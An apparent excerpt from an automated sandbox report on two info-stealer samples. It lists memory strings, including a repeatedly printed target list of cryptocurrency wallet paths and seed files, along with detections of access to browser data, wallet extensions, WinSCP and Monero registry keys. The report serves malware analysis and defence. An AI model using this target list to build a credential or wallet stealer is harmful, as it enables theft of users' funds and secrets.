Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: A247.exe, 00000005.00000003.2723762834.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Opens network shares

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: \\config\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: \\config\			Jump to behavior

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
